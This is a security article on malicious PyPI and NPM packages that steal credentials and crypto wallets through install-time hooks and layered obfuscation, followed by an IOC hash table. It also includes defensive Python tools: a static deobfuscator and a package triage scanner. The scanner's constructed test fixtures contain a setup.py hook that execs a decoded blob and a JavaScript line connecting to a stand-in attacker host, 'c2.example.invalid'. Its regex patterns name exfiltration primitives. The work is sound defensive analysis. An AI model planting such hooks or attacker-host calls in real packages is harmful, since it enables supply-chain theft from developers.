Threat Actors Exploit Open-Source Vulnerabilities to Spread Malicious Code


FortiGuard Labs has reported a sustained trend in the exploitation of open-source software (OSS) repositories for malware dissemination within supply chain ecosystems.

As development workflows increasingly depend on third-party packages, adversaries are abusing the open publishing model of package registries such as NPM and PyPI (uploading malicious packages rather than exploiting flaws in the registries themselves) to inject malicious code into the dependency chain, exfiltrate data, and inflict broader damage.

Leveraging proprietary AI-driven malware detection and real-time monitoring, FortiGuard’s systems enable proactive identification of emerging threats.

OSS Supply Chain Attacks

Analysis from Q2 2025 indicates that attacker methodology has changed little: the core tactics persist despite heightened awareness.

During this period, over 1.4 million NPM packages and 400,000 PyPI packages were scanned, revealing a significant volume of malicious artifacts.

Key behaviors include data exfiltration via setup or install scripts. Statistical insights from over a thousand confirmed cases show high incidences of low file counts, absent linked repositories, and obfuscated code, techniques chosen to minimize the detection footprint, defeat traceability, and execute payloads stealthily at install time.

Compared to prior quarters, there was a notable uptick in obfuscation layers, underscoring attackers’ efforts to complicate static and dynamic analysis.

In-Depth Examination

Delving into specific instances, several PyPI packages exemplify these tactics, including simple-mali-pkg-0.1.0, confighum-0.3.5, sinontop-utils-0.3.5, solana-sdkpy-1.2.5, and solana-sdkpy-1.2.6.

These artifacts run code from install scripts, overwrite the install commands so that the payload executes during installation, ship minimal file structures, and wrap the payload in multiple layers of encoding and encryption to conceal credential and wallet theft.

Figure: Decrypted mali.py indicating the theft of personal data and wallets

For instance, the setup.py file in simple-mali-pkg-0.1.0 triggers a suspicious mali.py script wrapped in dozens of encryption layers; once decrypted, it exposes functions targeting personal data, browser credentials, and cryptocurrency wallets.

This pattern aligns with broader trends where threat actors prioritize rapid, silent deployment to harvest sensitive information without alerting users.
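To show how an analyst can unwrap layering of this kind without ever running the stub, here is an added example (not FortiGuard's code and not the real mali.py): a static peeler that locates each exec() wrapper in the AST and applies only whitelisted decoders (base64, zlib, bytes.fromhex and the [::-1] reversal trick) to literal data. The wrap() helper, the sample payload and the layer count are constructed for the demo; a stub that uses a decoder outside the whitelist makes the peeler raise ValueError rather than execute anything.

```python
"""Peel nested exec()/decode wrappers from an obfuscated Python stub without
executing any of it.  Added example, not FortiGuard's tooling; the layered
sample is constructed here to stand in for a mali.py-style stub."""
import ast
import base64
import zlib

# Decoders the evaluator may apply to literal data.  Anything outside this
# table (os.system, socket, urllib, ...) is refused, so no payload ever runs.
SAFE_FUNCS = {
    ("base64", "b64decode"): base64.b64decode,
    ("base64", "b32decode"): base64.b32decode,
    ("base64", "b16decode"): base64.b16decode,
    ("zlib", "decompress"): zlib.decompress,
    ("bytes", "fromhex"): bytes.fromhex,
}


def _module_name(node):
    """Map `__import__('zlib')` or the bare name `zlib` to the string 'zlib'."""
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
            and node.func.id == "__import__" and node.args
            and isinstance(node.args[0], ast.Constant)):
        return node.args[0].value
    if isinstance(node, ast.Name):
        return node.id
    return None


def _static_eval(node):
    """Evaluate a whitelisted expression tree (literals, slices, safe decoders)."""
    if isinstance(node, ast.Constant):
        return node.value
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
        return -_static_eval(node.operand)
    if isinstance(node, ast.Subscript) and isinstance(node.slice, ast.Slice):
        s = node.slice  # covers the common data[::-1] reversal trick
        parts = [_static_eval(p) if p is not None else None for p in (s.lower, s.upper, s.step)]
        return _static_eval(node.value)[slice(*parts)]
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
        key = (_module_name(node.func.value), node.func.attr)
        if key in SAFE_FUNCS:
            return SAFE_FUNCS[key](_static_eval(node.args[0]))
        if node.func.attr == "decode":
            return _static_eval(node.func.value).decode()
    raise ValueError("refusing to evaluate: " + ast.dump(node)[:80])


def peel(source, max_layers=64):
    """Strip exec(...) wrappers one at a time; return (layers_removed, inner_source)."""
    for n in range(max_layers):
        tree = ast.parse(source)
        call = next((c for c in ast.walk(tree) if isinstance(c, ast.Call)
                     and isinstance(c.func, ast.Name) and c.func.id == "exec"), None)
        if call is None:
            return n, source
        inner = _static_eval(call.args[0])
        source = inner.decode() if isinstance(inner, bytes) else inner
    raise ValueError("still wrapped after %d layers" % max_layers)


def wrap(source, layers):
    """Constructed sample generator: nest zlib+base64 exec() layers, reversing every other blob."""
    for i in range(layers):
        blob = base64.b64encode(zlib.compress(source.encode())).decode()
        if i % 2:
            source = ("exec(__import__('zlib').decompress("
                      "__import__('base64').b64decode(%r[::-1])))" % blob[::-1])
        else:
            source = "exec(__import__('zlib').decompress(__import__('base64').b64decode(%r)))" % blob
    return source


if __name__ == "__main__":
    stub = wrap("print('stealer logic would be here')", 12)
    layers, plain = peel(stub)
    print("peeled %d layers -> %s" % (layers, plain))
```

Run the file directly to see the constructed 12-layer stub reduced to its plaintext. Real stubs often mix in decoders not listed in SAFE_FUNCS (custom XOR loops, marshal, compiled code objects); extend the table only with pure, side-effect-free functions so the peeler stays safe to point at untrusted samples.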

Similarly, the NPM package postcss-theme-vars-7.0.7 mirrors these approaches: it impersonates the legitimate PostCSS libraries and hides obfuscated JavaScript in a file named test-samples.dat so that the payload passes for test data.

Deobfuscation reveals sophisticated routines for stealing browser profiles (e.g., Chrome and Brave), saved passwords, autofill data, extension configurations, and sensitive documents, alongside keylogging, screenshot capture, and clipboard monitoring.

Data is exfiltrated over socket connections to attacker-controlled servers, a pattern carried over from earlier campaigns, including those attributed to North Korean APT groups.

These examples illustrate how adversaries adapt proven methods, like code impersonation and behavioral evasion, to maintain efficacy in evolving OSS landscapes.
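The traits the report counts across the Q2 2025 cases (install-time hooks, very few files, no linked repository, decode/exec obfuscation) and the npm tricks described above (a lifecycle script, a payload hidden in a .dat file, socket exfiltration) can be turned into a static triage check that runs before a package is installed. The following is an added example, not FortiGuard's scanner and not the real packages named in the report: the sample package trees, the MIN_FILES threshold and the regex marker lists are assumptions constructed for the demo.

```python
"""Static triage of a package's install surface.  Added example, not
FortiGuard's scanner: it scores a package tree ({path: bytes}) for the traits
the report ties to malicious PyPI/npm uploads.  Thresholds and the sample
trees below are assumptions constructed for the demo."""
import ast
import json
import re

NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
SETUPTOOLS_CMDS = {"install", "develop", "egg_info", "build_py"}
MIN_FILES = 5  # assumption: confirmed-malicious uploads tend to ship very few files
OBFUSCATION = re.compile(rb"b64decode|zlib\.decompress|\bexec\(|\beval\(|new Function\("
                         rb"|(?:\\x[0-9a-f]{2}){4}", re.I)
NETWORK = re.compile(rb"socket\.socket|net\.connect|requests\.post|urllib\.request", re.I)
SIDE_LOAD = re.compile(rb"""readFileSync\(\s*['"][^'"]+\.(?:dat|bin|txt|jpg|png)['"]""", re.I)


def _setup_py_findings(src):
    """Look for install-time hooks and missing repository metadata in setup.py."""
    out, has_url = [], False
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                name = base.attr if isinstance(base, ast.Attribute) else getattr(base, "id", "")
                if name in SETUPTOOLS_CMDS:
                    out.append("setup.py subclasses setuptools command %r" % name)
        elif isinstance(node, ast.Call) and getattr(node.func, "id", "") == "setup":
            kws = {k.arg for k in node.keywords}
            has_url = bool(kws & {"url", "project_urls"})
            if "cmdclass" in kws:
                out.append("setup() replaces commands via cmdclass (code runs on pip install)")
    if not has_url:
        out.append("setup() declares no url/project_urls (no linked repository)")
    return out


def _package_json_findings(src):
    """Look for lifecycle hooks and missing repository metadata in package.json."""
    meta, out = json.loads(src), []
    hooks = NPM_HOOKS & set(meta.get("scripts", {}))
    if hooks:
        out.append("package.json runs lifecycle hooks on install: " + ", ".join(sorted(hooks)))
    if "repository" not in meta:
        out.append("package.json has no repository field")
    return out


def triage(files):
    """Return (finding_count, findings) for a {path: bytes} package tree."""
    findings = []
    if len(files) < MIN_FILES:
        findings.append("only %d files in package" % len(files))
    for path, data in files.items():
        base = path.rsplit("/", 1)[-1]
        if base == "setup.py":
            findings += _setup_py_findings(data.decode())
        elif base == "package.json":
            findings += _package_json_findings(data.decode())
        if OBFUSCATION.search(data):
            findings.append(path + ": decode/exec obfuscation markers")
        if NETWORK.search(data):
            findings.append(path + ": network exfiltration primitives")
        hit = SIDE_LOAD.search(data)
        if hit:
            findings.append(path + ": executes content of a non-code file: " + hit.group(0).decode())
    return len(findings), findings


# Constructed sample trees (not the real packages named in the report).
BENIGN_SDIST = {
    "goodlib/setup.py": b"from setuptools import setup\n"
                        b"setup(name='goodlib', version='1.0', packages=['goodlib'],\n"
                        b"      url='https://example.invalid/goodlib')\n",
    "goodlib/goodlib/__init__.py": b"from .core import add\n",
    "goodlib/goodlib/core.py": b"def add(a, b):\n    return a + b\n",
    "goodlib/tests/test_core.py": b"from goodlib import add\nassert add(1, 2) == 3\n",
    "goodlib/README.md": b"# goodlib\n",
    "goodlib/LICENSE": b"MIT\n",
}
MALICIOUS_SDIST = {
    "badpkg/setup.py": b"from setuptools import setup\n"
                       b"from setuptools.command.install import install\n"
                       b"class Hook(install):\n"
                       b"    def run(self):\n"
                       b"        import base64, zlib\n"
                       b"        exec(zlib.decompress(base64.b64decode(open('mali.py').read())))\n"
                       b"        install.run(self)\n"
                       b"setup(name='badpkg', version='0.1.0', cmdclass={'install': Hook})\n",
    "badpkg/mali.py": b"eJzLSM3JyQcABiwCFQ==\n",  # constructed opaque blob standing in for the layered stub
}
MALICIOUS_NPM = {
    "package/package.json": b'{"name": "theme-vars-example", "version": "7.0.7",'
                            b' "scripts": {"postinstall": "node index.js"}}',
    "package/index.js": b"const fs = require('fs'), net = require('net');\n"
                        b"new Function(fs.readFileSync('test-samples.dat', 'utf8'))();\n"
                        b"net.connect(4444, 'c2.example.invalid');\n",
    "package/test-samples.dat": b"\\x76\\x61\\x72\\x20\\x73 ...",
}

if __name__ == "__main__":
    for label, tree in (("benign sdist", BENIGN_SDIST), ("malicious sdist", MALICIOUS_SDIST),
                        ("malicious npm", MALICIOUS_NPM)):
        score, notes = triage(tree)
        print("%s: %d findings" % (label, score))
        for n in notes:
            print("  -", n)
```

Running the file prints zero findings for the benign tree and a list of concrete reasons for the two constructed malicious ones. The regex markers are deliberately crude; in a pipeline this check belongs in front of a sandboxed install, not instead of one, since a single finding (a postinstall hook, a missing repository field) is common in legitimate packages and only the combination is suspicious.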

Q2 2025 findings affirm the enduring nature of OSS supply chain threats, with attackers relying on discreet exfiltration and obfuscation to exploit the expanding attack surface.

Organizations are urged to enhance defenses through vigilant monitoring, awareness of dependency risks, and integration of advanced scanning tools.

Fortinet’s protections, including AntiVirus detections for these packages and Web Filtering to block associated URLs, provide robust safeguards, while services like FortiDevSec prevent malicious dependencies in development pipelines.

For suspected breaches, contacting incident response teams is advised to mitigate impacts.

Indicators of Compromise (IOCs)

Package Name               SHA256 Hash                                                        Detection
simple-mali-pkg-0.1.0      a9114a446a136ddf38c16f9e1bb1a83400cba423d0d97df121a54b67829be7b9   Python/FreeCodingTools.10037449!tr
confighum-0.3.5            2e037be549c01fec14d9cad59075708476e90456deb53811f4301eb111c1104b   Python/FreeCodingTools.10037449!tr
sinontop-utils-0.3.5       00892955b1a2302536f4d7175cd30d89f961c1f45d56461e62ba0549b5906ae9   Python/FreeCodingTools.10037449!tr
solana-sdkpy-1.2.5         d63099defcc1ee6dcbcbb68383e435347b661a9e399f5a028f735b5f6f3f86d7   Python/FreeCodingTools.10037449!tr
solana-sdkpy-1.2.6         de23b7350619938388cc01f8086df95858495c6c8d73743a3c20d0ced3aece5b   Python/FreeCodingTools.10037449!tr
postcss-theme-vars-7.0.7   2d9d200b8e167fc95120e893dd3d7d02789a8ba41ba2632af2e342f35d1d2283   JS/Stealer.A!tr
